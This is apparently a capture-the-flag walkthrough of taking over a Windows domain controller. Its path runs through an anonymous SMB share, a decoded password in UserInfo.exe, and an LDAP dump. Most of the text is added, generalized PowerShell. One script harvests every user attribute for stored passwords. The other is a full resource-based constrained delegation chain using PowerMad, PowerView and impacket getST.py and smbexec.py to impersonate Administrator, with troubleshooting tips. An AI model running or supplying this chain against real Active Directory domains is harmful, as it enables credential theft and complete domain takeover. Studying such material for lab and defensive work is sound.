Nmap scan:
I found that SMB on this machine accepts a null session (anonymous login with no credentials):
Viewing the support-tools share, we find that it contains multiple binaries.
Only one of them was interesting: UserInfo.exe. I copied it to my Windows VM and opened it in dnSpy.
Decompiled, the binary turns out to send LDAP queries, which means it has to authenticate to the domain somehow:
Looking around, I also found this password function.
It obfuscates the password rather than encrypting it, so reimplementing its logic in a few lines of Python is enough to decode it. Running that outputs the password.
Since the binary authenticates to LDAP, the next step was to use the username and password it embeds to query LDAP myself.
Going through the output, I found a password for the support user hidden in one of its attributes.
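The LDAP step above, as an added example (not code from the original post): authenticate to the DC with the credentials recovered from the binary and dump every attribute of every user account, rather than only the handful you would normally read. The DC hostname, base DN, username and password are placeholders (assumptions); substitute the values from your own decode.

```powershell
# Added example, not part of the original writeup. Hostname, base DN and
# credentials are placeholders (assumptions); replace them with the decoded ones.
$dc       = 'dc.corp.local'           # assumption: DC hostname
$baseDn   = 'DC=corp,DC=local'        # assumption: domain naming context
$user     = 'corp\svc_ldap'           # assumption: the account embedded in the binary
$password = 'DecodedPasswordHere'     # assumption: the password the Python decode printed

# Bind with explicit credentials; DirectoryEntry uses simple/negotiate auth over LDAP.
$entry    = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$dc/$baseDn", $user, $password)
$searcher = New-Object System.DirectoryServices.DirectorySearcher($entry)
$searcher.Filter   = '(&(objectCategory=person)(objectClass=user))'
$searcher.PageSize = 500
# Deliberately leave PropertiesToLoad empty: the point is to see every attribute,
# including free-text ones an administrator may have left a note in.

# Attributes that always carry long, binary or uninteresting values; skipping them
# keeps the remaining output short enough to read by eye.
$noise = @('objectsid','objectguid','ntsecuritydescriptor','dscorepropagationdata',
           'whencreated','whenchanged','usnchanged','usncreated','lastlogontimestamp',
           'lastlogon','lastlogoff','pwdlastset','badpasswordtime','accountexpires',
           'logonhours','objectclass','objectcategory','distinguishedname','cn','name',
           'samaccounttype','instancetype','countrycode','codepage','logoncount',
           'badpwdcount','primarygroupid','useraccountcontrol','admincount',
           'msds-supportedencryptiontypes','memberof','userprincipalname',
           'samaccountname','displayname','givenname','sn')

foreach ($r in $searcher.FindAll()) {
    $sam = $r.Properties['samaccountname'][0]
    foreach ($attr in $r.Properties.PropertyNames) {
        if ($noise -contains $attr) { continue }
        foreach ($val in $r.Properties[$attr]) {
            if ($val -is [byte[]]) { continue }        # skip remaining binary blobs
            '{0,-16} {1,-28} {2}' -f $sam, $attr, $val
        }
    }
}
```

Free-text fields such as description, info and comment are the usual places where a password ends up, so read those lines first. The same dump can be taken from Linux with `ldapsearch -x -H ldap://DC -D 'user@domain' -w 'password' -b 'DC=corp,DC=local' '(objectClass=user)'` and piped through grep; whichever tool you use, the check that matters is not filtering the attribute list before you have looked at all of it.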
We can then evil-winrm in as the support user.
Once in, I ran BloodHound to enumerate the domain. Reviewing the results, this set of permissions over the DC stood out:
We can use PowerMad and PowerView to abuse the GenericAll privilege over the DC's computer object.
We can use this set of commands to create a new machine account and delegate to it:
This gives us a shell.
How it works: GenericAll on the DC's computer object lets us write its msDS-AllowedToActOnBehalfOfOtherIdentity attribute, which configures resource-based constrained delegation. We create a machine account we control with PowerMad, point that attribute at it with PowerView, and can then request a service ticket for the DC while impersonating the Administrator (S4U2Self followed by S4U2Proxy). smbexec.py uses that ticket to give us a shell.
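The full chain, as an added example (these are not the exact commands from the original post): PowerMad and PowerView loaded in the evil-winrm session as the support user, followed by the impacket commands run from the attack box. The domain name, DC name, machine-account name and its password are placeholders (assumptions).

```powershell
# Added example, not the original post's commands. Domain, DC and machine-account
# names and the password are placeholders (assumptions).
$domain      = 'corp.local'        # assumption
$dcName      = 'DC'                # assumption: sAMAccountName of the DC without the trailing $
$dcFqdn      = "dc.$domain"        # assumption
$newComputer = 'EVILPC'            # assumption: machine account we are about to create
$newPassword = 'Passw0rd123!'      # assumption
$baseDn      = 'DC=' + ($domain -replace '\.', ',DC=')

Import-Module .\Powermad.ps1
Import-Module .\PowerView.ps1

# 1. New-MachineAccount only works while unprivileged users may still join machines
#    (ms-DS-MachineAccountQuota defaults to 10); check before relying on it.
$quota = (Get-DomainObject -Identity $baseDn -Properties ms-DS-MachineAccountQuota).'ms-DS-MachineAccountQuota'
if ($quota -le 0) { throw "ms-DS-MachineAccountQuota is $quota; cannot create a machine account" }

# 2. Create the machine account whose credentials we know.
New-MachineAccount -MachineAccount $newComputer `
    -Password (ConvertTo-SecureString $newPassword -AsPlainText -Force) `
    -Domain $domain -DomainController $dcFqdn -Verbose

# 3. Build a security descriptor granting full access to that account's SID.
#    The SID must be the new account's, not the DC's.
$sid     = (Get-DomainComputer -Identity $newComputer -Properties objectsid).objectsid
$sd      = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$sid)"
$sdBytes = New-Object byte[] ($sd.BinaryLength)
$sd.GetBinaryForm($sdBytes, 0)

# 4. GenericAll on the DC lets us write the RBCD attribute on its computer object.
Get-DomainComputer -Identity $dcName |
    Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity' = $sdBytes} -Verbose

# 5. Verify the write landed and decodes back to our SID before moving on.
$raw   = (Get-DomainComputer -Identity $dcName -Properties 'msds-allowedtoactonbehalfofotheridentity').'msds-allowedtoactonbehalfofotheridentity'
$check = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $raw, 0
$check.DiscretionaryAcl | ForEach-Object { $_.SecurityIdentifier }   # should print $sid

# 6. From the attack box (impacket): request a service ticket for the DC's CIFS
#    service as Administrator via S4U2Self/S4U2Proxy, then use it with smbexec.py.
#    getST.py -spn cifs/dc.corp.local -impersonate Administrator -dc-ip <DC IP> 'corp.local/EVILPC$:Passw0rd123!'
#    export KRB5CCNAME=<ccache file name printed by getST.py>
#    smbexec.py -k -no-pass corp.local/Administrator@dc.corp.local
```

Two things commonly break this at step 6. A `KRB_AP_ERR_SKEW` error means the attack box's clock is too far from the DC's; sync it against the DC first. And the target for smbexec.py has to be the same FQDN used in the SPN, since the ticket is bound to that service name. The chain also depends on the Administrator account not being marked "sensitive and cannot be delegated" or placed in Protected Users; if it is, S4U2Proxy refuses the impersonation and a different target account has to be chosen.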